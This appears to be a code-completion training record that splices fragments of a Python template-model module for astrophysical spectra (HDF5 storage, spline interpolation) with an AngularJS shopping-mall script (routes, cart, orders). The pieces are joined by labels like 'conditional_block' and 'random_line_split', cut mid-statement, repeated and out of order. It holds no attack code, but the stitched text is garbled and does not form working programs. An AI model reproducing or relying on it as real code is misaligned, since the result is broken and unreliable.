types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
|
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized) | conditional_block |
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
| function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | # Make the dictionary of parameters
function_definition = collections.OrderedDict()
| random_line_split |
index.js | 列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
| app.controller("mallProListCtrl",["$scope",
"$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope | }else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]); | conditional_block |
index.js | ",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_body |
||
index.js | ",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
